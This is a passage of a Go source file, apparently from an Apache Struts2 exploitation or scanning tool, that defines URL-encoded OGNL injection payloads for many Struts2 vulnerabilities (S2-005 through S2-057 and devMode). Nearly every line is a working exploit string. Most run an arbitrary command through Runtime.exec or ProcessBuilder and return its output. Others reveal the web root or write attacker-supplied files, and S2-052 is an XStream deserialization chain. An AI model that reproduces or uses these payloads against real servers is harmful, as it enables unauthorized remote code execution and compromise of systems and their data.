.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29"
 20 | 	Exec_payload2 = "%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27{cmd}%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29"
 21 | )
 22 | 
 23 | // ExecPayload007 s2-008
 24 | var ExecPayload007 = "'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))%20%2B%20'"
 25 | 
 26 | // ExecPayload008 s2-008
 27 | var ExecPayload008 = "/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29)"
 28 | 
 29 | // ExecPayload009 s2-009
 30 | var ExecPayload009 = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27{cmd}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[({key})(%27meh%27)]"
 31 | 
 32 | // ExecPayload012 s2-012
 33 | var ExecPayload012 = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D"
 34 | 
 35 | // s2-013
 36 | var (
 37 | 	WebPath013       = "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23k8out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23k8out.println(%23req.getRealPath(%22%2F%22))%2C%23k8out.close())%7D"
 38 | 	ExecPayload013   = "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D"
 39 | 	UploadPaylaod013 = "$%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23fos=%20new%20java.io.FileOutputStream(%23req.getParameter(%22f%22)),%23fos.write(%23req.getParameter(%22t%22).getBytes()),%23fos.close(),%23outstr.println(%22OK%22),%23outstr.close())%7D"
 40 | )
 41 | 
 42 | // ExecPayload015 s2-015
 43 | var ExecPayload015 = "%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream())%2C%23q%7D"
 44 | 
 45 | // s2-016
 46 | var (
 47 | 	CheckPoc016     = "redirect%3A%24%7B{r1}%2B{r2}%7D"
 48 | 	WebPath016      = "redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D"
 49 | 	ExecPayload016a = "redirect%3A%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B{cmd}%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader%20(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println%20(%23e)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D"
 50 | 	ExecPayload016b = "redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22{cmd}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D"
 51 | 	ExecPayload016c = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27CMD%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27ENCODING%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
 52 | )
 53 | 
 54 | // s2-019
 55 | var (
 56 | 	WebPath019     = "%23req%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')%2C%23resp%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23resp.setCharacterEncoding('{encoding}')%2C%23resp.getWriter().println(%23req.getSession().getServletContext().getRealPath('%2F'))%2C%23resp.getWriter().flush()%2C%23resp.getWriter().close()"
 57 | 	ExecPayload019 = "%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close()"
 58 | )
 59 | 
 60 | // ExecPayload029 s2-029
 61 | var ExecPayload029 = "(%23_memberAccess%5B'allowPrivateAccess'%5D%3Dtrue%2C%23_memberAccess%5B'allowProtectedAccess'%5D%3Dtrue%2C%23_memberAccess%5B'excludedPackageNamePatterns'%5D%3D%23_memberAccess%5B'acceptProperties'%5D%2C%23_memberAccess%5B'excludedClasses'%5D%3D%23_memberAccess%5B'acceptProperties'%5D%2C%23_memberAccess%5B'allowPackageProtectedAccess'%5D%3Dtrue%2C%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))"
 62 | 
 63 | // s2-032
 64 | var (
 65 | 	CheckPoc032    = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086"
 66 | 	WebPath032     = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding={encoding}"
 67 | 	ExecPayload032 = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding={encoding}&cmd={cmd}"
 68 | )
 69 | 
 70 | // s2-033
 71 | var (
 72 | 	CheckPoc033    = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086"
 73 | 	ExecPayload033 = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command={cmd}"
 74 | )
 75 | 
 76 | // s2-037
 77 | var (
 78 | 	WebPath037     = "%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f"
 79 | 	ExecPayload037 = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command={cmd}"
 80 | )
 81 | 
 82 | // s2-045
 83 | var (
 84 | 	WebPath045     = `%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath("/"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}`
 85 | 	ExecPayload045 = `%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='CMD').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}`
 86 | )
 87 | 
 88 | // s2-046
 89 | var (
 90 | 	WebPath046     = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#res.getWriter().print('')).(#res.getWriter().print('')).(#res.getWriter().print(#req.getSession().getServletContext().getRealPath('/'))).(#res.getWriter().flush()).(#res.getWriter().close())}\\0b"
 91 | 	CheckPoc046    = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\\0b"
 92 | 	ExecPayload046 = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('CMD'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}\\0b"
 93 | )
 94 | 
 95 | // ExecPayload048 s2-048
 96 | var ExecPayload048 = "%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream())).(%23q)%7D"
 97 | 
 98 | // ExecPayload052 s2-052
 99 | var ExecPayload052 = `<map>
100 |   <entry>
101 |     <jdk.nashorn.internal.objects.NativeString>
102 |       <flags>0</flags>
103 |       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
104 |         <dataHandler>
105 |           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
106 |             <is class="javax.crypto.CipherInputStream">
107 |               <cipher class="javax.crypto.NullCipher">
108 |                 <initialized>false</initialized>
109 |                 <opmode>0</opmode>
110 |                 <serviceIterator class="javax.imageio.spi.FilterIterator">
111 |                   <iter class="javax.imageio.spi.FilterIterator">
112 |                     <iter class="java.util.Collections$EmptyIterator"/>
113 |                     <next class="java.lang.ProcessBuilder">
114 |                       <command>
115 |                         {cmd}
116 |                       </command>
117 |                       <redirectErrorStream>false</redirectErrorStream>
118 |                     </next>
119 |                   </iter>
120 |                   <filter class="javax.imageio.ImageIO$ContainsFilter">
121 |                     <method>
122 |                       <class>java.lang.ProcessBuilder</class>
123 |                       <name>start</name>
124 |                       <parameter-types/>
125 |                     </method>
126 |                     <name>foo</name>
127 |                   </filter>
128 |                   <next class="string">foo</next>
129 |                 </serviceIterator>
130 |                 <lock/>
131 |               </cipher>
132 |               <input class="java.lang.ProcessBuilder$NullInputStream"/>
133 |               <ibuffer></ibuffer>
134 |               <done>false</done>
135 |               <ostart>0</ostart>
136 |               <ofinish>0</ofinish>
137 |               <closed>false</closed>
138 |             </is>
139 |             <consumed>false</consumed>
140 |           </dataSource>
141 |           <transferFlavors/>
142 |         </dataHandler>
143 |         <dataLen>0</dataLen>
144 |       </value>
145 |     </jdk.nashorn.internal.objects.NativeString>
146 |     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
147 |   </entry>
148 |   <entry>
149 |     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
150 |     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
151 |   </entry>
152 | </map>`
153 | 
154 | // ExecPayload053 s2-053
155 | var ExecPayload053 = "%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'{cmd}').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'%2Fc'%2C%23cmd%7D%3A%7B'%2Fbin%2Fbash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A"
156 | 
157 | // S2-devMode
158 | var (
159 | 	WebPathDevMode     = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest"
160 | 	ExecPayloadDevMode = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command={cmd}"
161 | )
162 | 
163 | // S2-057
164 | var (
165 | 	ExecPayload057a = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
166 | 	ExecPayload057b = "%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D"
167 | 	ExecPayload057c = "%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D"
168 | 	ExecPayload057d = "%24%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D"
169 | )
170 | 


--------------------------------------------------------------------------------